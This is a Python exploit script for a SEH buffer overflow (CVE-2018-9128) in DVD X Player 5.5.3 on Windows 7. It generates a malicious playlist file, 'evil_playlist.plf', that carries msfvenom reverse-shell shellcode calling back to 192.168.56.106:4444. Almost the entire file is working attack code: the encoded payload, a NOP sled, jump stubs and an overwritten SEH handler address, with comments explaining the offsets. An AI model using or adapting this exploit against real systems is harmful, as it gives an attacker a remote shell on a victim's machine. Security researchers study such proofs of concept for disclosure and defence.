#!/usr/bin/env python

# Exploit Title: DVD X Player 5.5.3 Buffer Overflow
# Date: 20.03.2019
# Exploit Author: Paolo Perego - paolo@armoredcode.com
# Vendor Homepage: http://www.dvd-x-player.com
# Software Link: http://www.dvd-x-player.com/download/DVDXPlayerSetup-Standard.exe
# Version: 5.5.3.8 and above
# Tested on: Windows 7 Professional SP1 x86
# CVE : CVE-2018-9128
# Similar EDB-ID: 44438 https://www.exploit-db.com/exploits/44438
# On Windows 7 the SEH handler address used here contains a 0x00 byte, which
# is obtained by supplying a restricted character instead. Because of that,
# every jump has to go backwards, towards the beginning of the shellcode.

# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.56.106 LPORT=4444 -b '\x00\x0a\x1a\x0d' -f py -v shellcode

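# Bytes the .plf parser cannot accept inside the payload (the set passed to
# msfvenom's -b above). The trailing SEH address deliberately uses 0x1a, so
# the check below is applied to the shellcode only.
BAD_CHARS = b"\x00\x0a\x0d\x1a"

# Encoded windows/shell_reverse_tcp payload, as emitted by the msfvenom
# command above. Written as bytes so the file is identical on Python 2 and 3
# (a str literal in text mode would re-encode bytes >= 0x80 on Python 3).
shellcode = b""
shellcode += b"\xb8\xb8\xfa\xed\xbb\xda\xc1\xd9\x74\x24\xf4\x5a"
shellcode += b"\x33\xc9\xb1\x52\x31\x42\x12\x03\x42\x12\x83\x7a"
shellcode += b"\xfe\x0f\x4e\x86\x17\x4d\xb1\x76\xe8\x32\x3b\x93"
shellcode += b"\xd9\x72\x5f\xd0\x4a\x43\x2b\xb4\x66\x28\x79\x2c"
shellcode += b"\xfc\x5c\x56\x43\xb5\xeb\x80\x6a\x46\x47\xf0\xed"
shellcode += b"\xc4\x9a\x25\xcd\xf5\x54\x38\x0c\x31\x88\xb1\x5c"
shellcode += b"\xea\xc6\x64\x70\x9f\x93\xb4\xfb\xd3\x32\xbd\x18"
shellcode += b"\xa3\x35\xec\x8f\xbf\x6f\x2e\x2e\x13\x04\x67\x28"
shellcode += b"\x70\x21\x31\xc3\x42\xdd\xc0\x05\x9b\x1e\x6e\x68"
shellcode += b"\x13\xed\x6e\xad\x94\x0e\x05\xc7\xe6\xb3\x1e\x1c"
shellcode += b"\x94\x6f\xaa\x86\x3e\xfb\x0c\x62\xbe\x28\xca\xe1"
shellcode += b"\xcc\x85\x98\xad\xd0\x18\x4c\xc6\xed\x91\x73\x08"
shellcode += b"\x64\xe1\x57\x8c\x2c\xb1\xf6\x95\x88\x14\x06\xc5"
shellcode += b"\x72\xc8\xa2\x8e\x9f\x1d\xdf\xcd\xf7\xd2\xd2\xed"
shellcode += b"\x07\x7d\x64\x9e\x35\x22\xde\x08\x76\xab\xf8\xcf"
shellcode += b"\x79\x86\xbd\x5f\x84\x29\xbe\x76\x43\x7d\xee\xe0"
shellcode += b"\x62\xfe\x65\xf0\x8b\x2b\x29\xa0\x23\x84\x8a\x10"
shellcode += b"\x84\x74\x63\x7a\x0b\xaa\x93\x85\xc1\xc3\x3e\x7c"
shellcode += b"\x82\x2b\x16\x46\x38\xc4\x65\xb6\xad\x48\xe3\x50"
shellcode += b"\xa7\x60\xa5\xcb\x50\x18\xec\x87\xc1\xe5\x3a\xe2"
shellcode += b"\xc2\x6e\xc9\x13\x8c\x86\xa4\x07\x79\x67\xf3\x75"
shellcode += b"\x2c\x78\x29\x11\xb2\xeb\xb6\xe1\xbd\x17\x61\xb6"
shellcode += b"\xea\xe6\x78\x52\x07\x50\xd3\x40\xda\x04\x1c\xc0"
shellcode += b"\x01\xf5\xa3\xc9\xc4\x41\x80\xd9\x10\x49\x8c\x8d"
shellcode += b"\xcc\x1c\x5a\x7b\xab\xf6\x2c\xd5\x65\xa4\xe6\xb1"
shellcode += b"\xf0\x86\x38\xc7\xfc\xc2\xce\x27\x4c\xbb\x96\x58"
shellcode += b"\x61\x2b\x1f\x21\x9f\xcb\xe0\xf8\x1b\xf5\x11\x30"
shellcode += b"\xb6\x62\x88\xa1\xfb\xee\x2b\x1c\x3f\x17\xa8\x94"
shellcode += b"\xc0\xec\xb0\xdd\xc5\xa9\x76\x0e\xb4\xa2\x12\x30"
shellcode += b"\x6b\xc2\x36"

# A restricted byte anywhere in the payload would make the parser truncate or
# mangle the record, silently breaking every offset below. Fail loudly instead.
# (int-in-bytes on Python 3, str-in-str on Python 2 -- both work.)
_offenders = [c for c in BAD_CHARS if c in shellcode]
if _offenders:
    raise SystemExit("shellcode contains restricted byte(s): %r" % (_offenders,))

# Layout of the record (offsets from the start of the file):
#   [0, 600)    NOP sled, then the shellcode right-aligned to end at 600
#   [600, 608)  "backflip" stub: 3 NOPs + a near jmp back into the sled
#   [608, 612)  nSEH: short jmp backwards onto the backflip stub
#   [612, 616)  SEH handler address
PAYLOAD_AREA = 600

# nasm > jmp $-400
# 00000000 E96BFEFFFF jmp 0xfffffe70
# rel32 = 0xFFFFFE6B = -405, measured from the instruction that follows the
# jmp. The E9 sits at offset 603, so execution lands at 608 - 405 = 203.
backflip = b"\x90\x90\x90\xE9\x6B\xFE\xFF\xFF"
BACKFLIP_TARGET = PAYLOAD_AREA + len(backflip) - 405

# The backward jmp must land in the NOP sled, i.e. before the first shellcode
# byte. This also catches a payload larger than the whole 600-byte area, which
# would otherwise give an empty sled and shift every offset.
shellcode_start = PAYLOAD_AREA - len(shellcode)
if shellcode_start < BACKFLIP_TARGET:
    raise SystemExit(
        "shellcode is %d bytes; it must start at or after offset %d so the "
        "backward jmp lands in the NOP sled (max %d bytes)"
        % (len(shellcode), BACKFLIP_TARGET, PAYLOAD_AREA - BACKFLIP_TARGET)
    )

junk = b"\x90" * shellcode_start
junk += shellcode
junk += backflip

# nSEH: EB F6 = jmp short -10 (relative to the next instruction), i.e. 8 bytes
# back from nSEH itself -- exactly the first byte of the backflip stub.
junk += b"\xeb\xf6\x90\x90"

# SEH: 00401838 |. 5E POP ESI
# The gadget's 0x00 high byte cannot be written directly (restricted char),
# so 0x1a is supplied in its place; per the header note the player turns that
# into the needed 0x00 (mechanism not re-verified here). This is why the
# bad-char check above is limited to the shellcode.
junk += b"\x38\x18\x40\x1a"

# Binary mode: on Windows a text-mode write would turn \x0a into \x0d\x0a,
# and Python 3 would re-encode the str anyway.
with open("evil_playlist.plf", "wb") as fh:
    fh.write(junk)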